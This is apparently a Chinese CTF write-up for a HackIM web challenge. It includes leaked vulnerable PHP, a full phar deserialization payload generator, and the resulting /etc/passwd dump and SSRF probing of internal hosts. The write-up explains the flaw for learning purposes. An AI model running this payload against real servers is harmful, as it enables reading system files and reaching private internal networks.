hackim web
escape
rfv
查看响应信息发现字段 X-Powered-By，其值为 express，可知后端为 Node.js（Express 框架）。
mime checkr
只能上传.jpeg
格式图片,有一个类型检查的功能
这里有很重要的一点：存在一个 getmime.bak 备份源码文件（不看 writeup 我是肯定不知道的，orz）。.bak/.swp/.git 这类遗留文件是常规目录扫描项，实战中应先用字典扫一遍。
<?php
//error_reporting(-1);
//ini_set('display_errors', 'On');
// Leaked target-side helper (from getmime.bak). Fetches an arbitrary URL with
// curl and returns the response body. Nothing restricts the scheme (no
// CURLOPT_PROTOCOLS), so file://, http:// to internal hosts, etc. all work —
// this is what the phar payload below abuses (file:///etc/passwd, 172.21.0.x).
// No timeout is set either, so a request to an unreachable host just hangs.
class CurlClass{
// @param string $url  URL to fetch, fully attacker-controlled in this app.
// @return string|false  response body, or false when curl_exec() fails.
public function httpGet($url) {
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
// curl_setopt($ch,CURLOPT_HEADER, false);
$output=curl_exec($ch);
curl_close($ch);
return $output;
}
}
// Deserialization gadget. __destruct() runs whenever a MainClass instance is
// released — including one materialised by unserialize(), e.g. from the
// metadata of a phar archive opened through the phar:// wrapper below. It then
// fetches $this->url with CurlClass and echoes both the URL and the body, so
// whoever controls the serialized `url` property gets an SSRF / local-file
// read with the response reflected straight back (see the /etc/passwd dump
// further down the page). Neither property is declared; both are created
// dynamically, which is why the payload only needs to set `url`.
class MainClass {
public function __destruct() {
$this->why =new CurlClass;
echo $this->url;
echo $this->why->httpGet($this->url);
}
}
// Check if image file is an actual image or a fake image
// NOTE(review): $_POST['name'] is handed to getimagesize() unchanged, and that
// function accepts stream wrappers. A value such as
// phar://uploads/<file>.jpeg/test.txt makes PHP open the uploaded file as a
// phar archive and unserialize() its manifest metadata *before* any image
// check runs — that is what instantiates the MainClass gadget above. The
// "File is not an image." branch is still what gets printed, but the
// destructor has already fired. A fix would resolve the path inside the
// upload directory and reject anything with a scheme/wrapper prefix before
// calling getimagesize(). $uploadOk is set here but not consumed in this
// excerpt; presumably used further down the original file.
if(isset($_POST["submit"])) {
$check = getimagesize($_POST['name']);
if($check !== false) {
echo "File is an image - " . $check["mime"] . ".";
$uploadOk = 1;
} else {
echo "File is not an image.";
$uploadOk = 0;
}
}
?>
看到 MainClass 中的 __destruct()，就明白要反序列化了，由此想到 phar 协议的利用：getimagesize() 这类文件函数支持 stream wrapper，传入 phar:// 路径时 PHP 会解析 phar 的 manifest 并对其中的 metadata 调用 unserialize()，还原出的 MainClass 对象在释放时触发 __destruct()，从而以 $this->url 发起 SSRF / 任意文件读取。注意：据 PHP 8.0 的更新说明，phar:// 打开文件时已不再自动反序列化 metadata（仅在显式调用 getMetadata() 时才会），所以这一手法只对旧版本有效；这里目标是 PHP 5.5.9（见下方响应头）。
<?php
// Local mirror of the target's CurlClass. Only the class *name* ends up in the
// serialized payload; the method body is reproduced so the file stays a
// faithful copy of the leaked source, but it is never invoked by the generator.
class CurlClass
{
    /**
     * Fetch $url with curl (any scheme the local curl build allows) and return
     * the response body, or false if curl_exec() fails.
     */
    public function httpGet($url)
    {
        $handle = curl_init();
        curl_setopt_array($handle, [
            CURLOPT_URL            => $url,
            CURLOPT_RETURNTRANSFER => true,
        ]);
        $body = curl_exec($handle);
        curl_close($handle);
        return $body;
    }
}
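/**
 * Local stand-in for the target's MainClass gadget.
 *
 * serialize() stores only the class name and property values, never method
 * bodies, so the phar metadata produced below is byte-identical whether or
 * not __destruct() does anything here. The leaked destructor is deliberately
 * NOT reproduced: with it, the generator itself fired the gadget when $o was
 * released at script end — echoing the URL and curl-ing it from the
 * attacker's own machine (a local /etc/passwd read at best, a hang against an
 * unreachable 172.21.0.x host at worst). The real __destruct() runs on the
 * target when the phar is opened.
 */
class MainClass
{
    /** @var string URL the target's __destruct() will fetch and echo. */
    public $url;

    public function __destruct()
    {
        // Intentionally a no-op on the generator side; see class comment.
    }
}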
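// ---- Build the phar payload -----------------------------------------------
// Requires phar.readonly=0 (the CLI default is 1):
//     php -d phar.readonly=0 gen.php [url]
// The archive name must end in .phar for Phar to create it; rename the result
// to .jpeg afterwards to satisfy the upload filter — the phar:// wrapper does
// not care about the extension.
if (ini_get('phar.readonly')) {
    echo "phar.readonly is on; run with: php -d phar.readonly=0 " . basename(__FILE__) . " [url]\n";
    exit(1);
}

// URL the target's MainClass::__destruct() will fetch. Defaults to the
// original file:///etc/passwd probe; pass another one (e.g. http://172.21.0.3/)
// as the first CLI argument instead of editing the script per target.
$targetUrl = isset($argv[1]) ? $argv[1] : 'file:///etc/passwd';
$pharName  = 'zedd.phar';

// An existing archive would be reopened and appended to rather than rebuilt,
// so start from a clean file every run.
if (file_exists($pharName)) {
    unlink($pharName);
}

$phar = new Phar($pharName);
$phar->startBuffering();
// Stub: leading "GIF89a" bytes so a naive magic-byte image check passes;
// the __HALT_COMPILER marker is mandatory for a valid phar stub.
$phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>");

$o = new MainClass();
$o->url = $targetUrl;
// The serialized object is stored in the manifest metadata; the target
// unserialize()s it as soon as the archive is opened via phar://.
$phar->setMetadata($o);
// One file entry so the phar:// path has a file part (…/test.txt).
$phar->addFromString('test.txt', 'test');
// The signature is computed automatically on stopBuffering().
$phar->stopBuffering();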
?>
生成一个 phar 文件，将后缀改为 .jpeg（phar:// 不关心扩展名，改名只是为了通过上传侧的类型/后缀检查），上传，然后把 phar://uploads/<name.jpeg>/test.txt 作为 name 参数 POST 给调用 getimagesize() 的接口，成功返回：
HTTP/1.1 200 OK
Date: Sun, 31 Mar 2019 10:20:41 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.27
Vary: Accept-Encoding
Content-Length: 1003
Connection: close
Content-Type: text/html

File is not an image.
file:///etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
尝试访问 /etc/hosts，发现了一个 172.21.0.2 的地址（172.21.0.0/16 这类网段常见于 Docker 内网，只能借助 SSRF 到达），于是把 url 换成 http://172.21.0.2 重新生成 phar 去访问，发现无回显；然后再探测 172.21.0.3 主机，返回了信息：
http://172.21.0.3b'\xc8\x85\x93\x93\x96@a\x86\x85\xa3\x83\x88\xa1l\xad\xbd_|]M@@\x94\x85'
一个神奇的编码,EBCDIC_1047,这个我真没见过
利用python的EBCDIC库进行解码
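# Decode the EBCDIC (code page 1047) bytes returned by 172.21.0.3.
# cp1047 is not in CPython's built-in codec table; importing `ebcdic`
# (pip install ebcdic) registers it as a side effect.
import ebcdic  # noqa: F401  (registers the cp1047 codec)

# Raw response body as captured above. The bytes must be written with
# backslash escapes: the original paste had lost them (b'xc8x85...'), which
# is the literal ASCII text "xc8x85..." and decodes to garbage.
blob = b"\xc8\x85\x93\x93\x96@a\x86\x85\xa3\x83\x88\xa1l\xad\xbd_|]M@@\x94\x85"

# 0x40 is the EBCDIC space, so "@@" before "me" yields two spaces.
print(blob.decode("cp1047"))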
由于我电脑的问题,所以字符集显示的不正常,解码的正常值是
Hello /fetch~%[]^@)( me
于是再构造http://172.21.0.3/fetch~%[]^@)(
,再次得到一个类似的编码,将其解密,则得到flag
Author: damn1t
Link: http://microvorld.com/2019/03/26/CTF/hackim ctf/
Copyright: All articles in this blog are licensed under CC BY-NC-SA 3.0 unless stating additionally.